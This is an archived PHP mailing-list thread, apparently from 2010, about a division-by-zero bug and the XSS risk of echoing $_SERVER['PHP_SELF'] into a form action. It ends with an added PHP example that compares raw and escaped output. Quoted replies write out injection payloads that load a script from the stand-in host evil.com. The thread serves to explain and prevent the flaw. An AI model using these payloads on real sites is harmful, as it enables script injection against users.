RE: Division by 0

I have tried and tried, countless times to be removed from this list...
still when I go to my deleted items I can see that emails leak through.
If there is an administrator who can simply delete me ( simply because I
can not seem to do this correctly) I would greatly appreciate it. Thank
You!





 Sincerely,

 Michael Roberts
Executive Recruiter
 Corporate Staffing Services
 150 Monument Road, Suite 510
 Bala Cynwyd, PA 19004
 P 610-771-1084
 F 610-771-0390
 E mroberts@xxxxxxxxxxx
Check out my recent feature article in Professional Surveyor 12/09
edition. 
http://www.profsurv.com/magazine/article.aspx?i=70379






-----Original Message-----
From: Gary [mailto:gwpaul@xxxxxxx] 
Sent: Thursday, March 11, 2010 7:51 AM
To: php-general@xxxxxxxxxxxxx
Subject: Re:  Division by 0

I love this place, thank you to everyone that posted, I will make changes to
make it safer.

Thanks again to everyone.

gary


"Jochem Maas" <jochem@xxxxxxxxxxxxx> wrote in message 
news:4B98DE7E.8020506@xxxxxxxxxxxxxxxx
> On 3/10/10 11:39 PM, Daniel Egeberg wrote:
>> On Wed, Mar 10, 2010 at 23:44, Dmitry Ruban <dmitry@xxxxxxxxx> wrote:
>>> Hi Jochem,
>>>
>>> Jochem Maas wrote:
>>>>
>>>> On 3/10/10 6:23 PM, Joseph Thayne wrote:
>>>>>
>>>>> Looks to me like you are closing your form before you put anything in
>>>>> it.  Therefore, the loan_amount is not set making the value 0.  Follow
>>>>> the math, and you are dividing by 1-1.
>>>>>
>>>>> Change this line:
>>>>>
>>>>> <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post"></form>
>>>>>
>>>>> to:
>>>>>
>>>>> <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post">
>>>>
>>>> this is a XSS waiting to happen. I can put something like the following
>>>> in the request uri:
>>>>
>>>> index.php?" onsubmit="evil()"><script
>>>> src="http://www.evil.com/evi.js"></script>
>>>>
>>> Apparently it's not going to work. PHP_SELF does not include query string.
>>> So it is safe to use it this way.
>>>
>>> Regards,
>>> Dmitry
>>
>> No, it is not safe...
>>
>> This won't work:
>>   index.php?" onsubmit="evil()"><script
>> src="http://www.evil.com/evi.js"></script>
>>
>> But this will:
>>   index.php/" onsubmit="evil()"><script
>> src="http://www.evil.com/evi.js"></script>
>
> yeah sorry, I was lax and made the query string mistake,
> the issue stands though as Daniel pointed out.
>
>
>
>>
>
>
> __________ Information from ESET Smart Security, version of virus 
> signature database 4933 (20100310) __________
>
> The message was checked by ESET Smart Security.
>
> http://www.eset.com
>
>
> 








-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
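
Added example (not part of any message in this thread): the form tag discussed above, built three ways from a constructed $_SERVER array and then parsed to show which attributes the <form> element actually receives. The function names are hypothetical, the sample values are constructed from the request quoted in the thread, and the check assumes PHP's DOM extension is available.

```php
<?php
declare(strict_types=1);

// Constructed $_SERVER values for the path-info request quoted in the thread.
$server = [
    'SCRIPT_NAME' => '/index.php',
    'PHP_SELF'    => '/index.php/" onsubmit="evil()"><script src="http://www.evil.com/evi.js"></script>',
];

// Pattern from the thread: PHP_SELF echoed straight into the attribute.
function form_raw(array $s): string
{
    return '<form action="' . $s['PHP_SELF'] . '" method="post">';
}

// Same value, HTML-escaped for a double-quoted attribute.
function form_escaped(array $s): string
{
    return '<form action="' . htmlspecialchars($s['PHP_SELF'], ENT_QUOTES, 'UTF-8') . '" method="post">';
}

// SCRIPT_NAME has no trailing path info; it is still escaped on output.
function form_script_name(array $s): string
{
    return '<form action="' . htmlspecialchars($s['SCRIPT_NAME'], ENT_QUOTES, 'UTF-8') . '" method="post">';
}

// Parse the markup and report which attributes the <form> ended up with
// and how many <script> elements the fragment produced.
function inspect(string $html): array
{
    libxml_use_internal_errors(true);   // tolerate fragment-level parse warnings
    $doc = new DOMDocument();
    $doc->loadHTML('<html><body>' . $html . '</form></body></html>');
    libxml_clear_errors();
    $attrs = [];
    foreach ($doc->getElementsByTagName('form')->item(0)->attributes as $a) {
        $attrs[$a->name] = $a->value;
    }
    return ['form' => $attrs, 'scripts' => $doc->getElementsByTagName('script')->length];
}

foreach (['form_raw', 'form_escaped', 'form_script_name'] as $variant) {
    echo $variant, ': ', json_encode(inspect($variant($server)), JSON_UNESCAPED_SLASHES), PHP_EOL;
}
```

Compare the attribute lists: an onsubmit attribute or a non-zero script count means the value escaped the action attribute.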




